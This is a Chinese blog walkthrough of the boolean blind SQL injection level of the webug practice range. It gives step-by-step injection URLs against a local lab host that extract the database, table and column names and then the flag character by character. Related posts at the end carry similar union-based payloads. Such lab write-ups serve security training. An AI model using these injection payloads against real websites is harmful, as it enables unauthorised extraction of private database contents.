webug 2、布尔注入

已于 2022-03-15 17:01:49 修改
阅读量4.6k 收藏
点赞数
分类专栏: webug 文章标签: web安全 安全
于 2022-03-15 10:12:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43973470/article/details/123495384
版权

思路:先查询数据库长度,再查询数据库名
再查表个数,表长度,表名
再查列个数,列长度,列名
最后查表中对应字段
成功取flag值

url:http://192.168.1.4/control/sqlinject/bool_injection.php?id=1

判断注入点

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1'		报错
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and 1=1 %23	不报错,这里的%23为#的url编码
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and 1=2 %23	报错

查看数据库长度

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(database())=5 %23	
这里查到数据库长度为5,可使用二分法进行查询

查看数据库名

使用函数ascii(),substr()
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr(database(),1,1))=119 %23		
查询数据库的第一个字母为w
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr(database(),2,1))=101 %23		
查询数据库的第二个字母为e		修改substr函数的值
以此类推,查询到数据库名为webug

查询数据库中表个数

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and (select count(table_schema) from information_schema.tables where table_schema='webug')=7 %23		
表个数为7

查询数据库中每个表的长度

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),1))=9 %23		
查询出第一个表的长度为9
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema='webug' limit 1,1),1))=8 %23		
查询出第二个表的长度为8	通过limit的值来查询第二个表
以此类推,可查出其他五个表的长度

取flag值

因flag值在第二个表中,故查询第二个表的信息
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 1,1),1))=101 %23		
第二个表的第一个字母为e
以此类推,查询第二表为:env_list

查询表二中有多少个列

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and (select count(column_name) from information_schema.columns where table_name='env_list')=8 %23	
表中有8列

查询表二的第一个列长度

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1))=2 %23		
长度为2
查询第二个表第一列的第一个字母
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 0,1),1))=105 %23		
第一个字母为i		
以此类推,第二个字母为d,所以,表的第一列为id

查询表二的第二个列长度

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='env_list' limit 1,1),1))=7 %23		
长度为7
查询第二个表第二个列的第一个字母
http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='env_list' limit 1,1),1))=101 %23		
第一个字母为e		
以此类推,表的第二个列为envName

因为flag在第六列中,使用上述方法,先查询表二中第六列的长度,再查列的字母,查出第六列为:envFlag

库名:webug
表名:env_list
表中列名:id,envName,…,envFlag,…

查flag值的长度

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and length(substr((select envFlag from env_list where id=2 limit 0,1),1))=9 %23		
flag值长度为9

查flag值的第一个字母

http://192.168.1.4/control/sqlinject/bool_injection.php?id=1' and ascii(substr((select envFlag from env_list where id=2 limit 0,1),1))=102 %23		
flag值的第一个字母为:f
以此类推,flag值为:fdsafsdfa
乔木同学
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Webug靶场平台下载以及安装教程
liver100day的博客
04-19 6183
Webug靶场平台下载以及安装教程 一.基础介绍 WeBug 名称定义为”我们的漏洞”靶场环境 ,基础环境是基于 PHP/mysql 制作搭建而成,中级环境与高级环境分别都是由互联网漏洞事件而收集的漏洞存在的操作环境。部分漏洞是基于Windows操作系统的漏洞所以将WeBugweb环境都装在了一个纯净版的Windows 2003的虚拟机中。在 webug3.0 发布后的四百多天 226安全团队终于在大年初二发布了 webug 的 4.0 版本。 二.详细操作解析 1.安装需要使用到VM,这里附上VM的官网
webug--布尔注入
gclome的博客
05-09 706
访问靶场: (1)判断注入点 输入id=1’有反应 (2)判断字段数 利用二分法,可以判断出字段数为2 id=1' order by 2 %23 (3)爆出当前数据库名 id=1' union select 1,database() %23 爆出数据库名为webug (4)爆出当前数据库下的表 id=1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug'%2
iwebsec靶场 SQL注入漏洞通关笔记3- bool注入布尔型盲注)
mooyuan的博客
11-26 2442
iwebsec靶场的SQL注入漏洞的第03关bool注入漏洞渗透,通过源码再来分析下布尔型SQL注入重点内容:(1)闭合方式是什么?iwebsec的第03关关卡为数字型(2)注入类别是什么?这部分通过源码分析与手注很容易判断出是布尔注入(3)是否过滤了关键字?很明显通过源码,iwebsec的布尔型关卡无过滤任何信息了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第3关bool注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
布尔盲注(结合BurpSuite暴力破解)
最新发布
weixin_59047731的博客
11-17 574
有些情况下,**开发人员屏蔽了报错信息**,导致攻击者无法通过报错信息进行注入的判断。这种情况下的注入,称为盲注。盲注根据展现方式,分为**boolean型盲注和时间型盲注**。 Boolean是基于真假的判断(true or false); 不管输入什么,结果都只返回真或假两种情况; 通过and 1=1和and 1=2可以发现注入点。 Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果 判断正确与否。
【SQL注入-无回显】布尔盲注:原理、函数、利用过程
06-14 6368
【SQL注入-无回显】
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
Unity 布尔算法插件CSG
03-28
CSG允许您通过执行对象之间的减法、联合和交集来创建新的网格。您可以在Unity编辑器或运行时执行操作。得到的几何形状保留了原始网格的纹理UV坐标。该程序还按预期处理旋转和缩放的对象,适用于具有多个材料和子网格...
cgal 模型布尔运算代码
11-21
生成dll的主要代码部分,需提前配置cgal和相关boost库,本人用于在ue4中使用
LabVIEW的布尔型数据
01-19
布尔型数据在LabVIEW中的应用比较广泛。因为LabVIEW程序设计很大一部分功能体现在仪器设计上,而在设计仪器时经常会有一些控制按钮和指示灯之类的控件,这些控件的数据类型一般为布尔型;另外,在程序设计过程中进行...
布尔逻辑运算符
12-09
布尔逻辑运算符的运算数只能是布尔型。而且逻辑运算的结果也是布尔类型(见表4-5 )。 表4-5 布尔逻辑运算符及其意义 运算符 含义 & 逻辑与 逻辑或 ^ 异或 短路或 && 短路与 ! 逻辑反 &= 逻辑与赋值(赋值的简写形式...
SQL盲注第一天-布尔注入
2201_75389336的博客
01-19 233
SQL盲注第一天-布尔注入
sqli-labs第八关-布尔注入
weixin_51706044的博客
03-30 3963
文章目录布尔注入一、第八关爆数据库名判断长度爆破数据库名二、使用步骤总结 布尔注入 如果页面既没有显示位,也没有报错提示的话,可以使用布尔注入. 通过插入一些语句查看结果来判断是否存在布尔注入. 布尔注入的几个常用函数 函数使用: length(select database())>5 #length()里可以放查询语句,用来判断查询结果的长度 exists( ) #exists()里可以放查询语句,用来判断查询结果是否存在 ascii( ) #ascii()里可以放查询.
webug通关攻略
yyx的博客
04-29 4274
webug通关攻略第一关 很简单的get注入第二关 从图片中找到有用的信息第三关 渗透网站的时候目录也很重要第四关 当遇到五位验证码的时候可以爆破第五关 头部的一个注入第六关 支付问题:用最少的钱去购买到一本书!第七关 越权第八关 csrf 管理员每天晚上10点上线第九关 url跳转 你能跳转到百度页面吗?第十关 文件下载第十一关第十二关 我忘记了系统密码第十三关 XSS第十四关 储存型xss第十...
webug3.0安装
热门推荐
过客璇璇的博客
03-05 1万+
像我这样好多新手想找一个很好的靶场,但是别人推荐好了又不知道怎么搭建,就去百度上狂搜,结果有没有详细的方法,接下来我就把自己搭建的过程中一步一步解释一下: 第一步:下载 先在浏览器上搜索webug 点进去如下图: 或者下载链接为:https://www.webug.org/ 第二步:解压 下载完成后是有61如下图所示的压缩包: 我们选择其中一个解压得到文件夹2003 点...
webug靶场注入
weixin_45705209的博客
08-26 815
注入 显错注入 单引号报错,构造闭合,payload' and 1=1--+与 ' and 1=2,页面返回的信息不一致,由此还可以判断出存在注入,用order by查出字段数为二,union 联合查询找到回显点位置,带入select语句查询。 查询所有的库名payload:-1' union select 1,group_concat(schema_name) from information_schema.schemata --+,这里查出来的库有一些我在本地搭建环境中其他的库,其中informatio
Webug3.0-渗透基础-解题
Blood_Pupil的博客
03-13 7017
Webug下载与安装 首先在Webug3.0官网 下载虚拟机 在本地进行解压,解压后为Win2003 VM虚拟机镜像。 虚拟机密码为123456,崩溃后可以直接将快照恢复到gh0st即可。 在kali下可以使用 Vmware Linux版打开,Windonws 下可以使用 Vmware Windows版打开,Mac下可以使用 Vmware Fusion打开。 在虚拟机命令窗口敲入ipconfi...
wepy2.0点击事件bug
microcosm1994的博客
06-17 479
问题:does not have a method “_proxy” to handle event “tap”. 有可能是版本问题,修改package.json https://github.com/Tencent/wepy/issues/2553 修改前: "dependencies": { "@vant/weapp": "^1.3.2", "@wepy/core": "^2.0.0-alpha.16", // 这里 "@wepy/x": "^2.0.2", "minip
webug4.0下载安装详细教程
陆总的博客
01-20 8140
一、背景:很久没更新博客了,在工作过程中解除到渗透测试相关内容,首先给小白介绍一个入门渗透测试很好的训练场,就是webug4.0(-是226安全团队送来的新年礼物); 二、详细操作流程: 1、前期材料准备: a、需要用到vm,大家可以自行下载VMware,但是考虑到大家还是想早点入门,此处付一官方下载链接:https://www.vmware.com/cn/products/...
webug4.0——逻辑漏洞篇
A_dmin的博客
09-11 1066
webug4.0——逻辑漏洞篇第二十二关 越权修改密码第二十三关 支付漏洞第二十四关 邮箱轰炸第二十五关 越权查看admin 第二十二关 越权修改密码 进入发现只有两个页面,,, 一个登陆页面,一个修改密码的页面 修改密码的页面是能够成功修改密码的 看情况应该是有两个账号的,我们去查看一下数据库: 果然是有两个账号的,直接拿aaaaa账号来进行越权修改admin的密码 先登录aaaaa进行...
墨者学院sql注入布尔
07-27
墨者学院SQL注入布尔是一种常见的SQL注入攻击技术,它利用布尔逻辑来判断SQL查询的真假条件。通过构造恰当的SQL语句,攻击者可以绕过输入验证,直接操作数据库,从而获取、修改或删除敏感数据。 在布尔注入攻击中,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值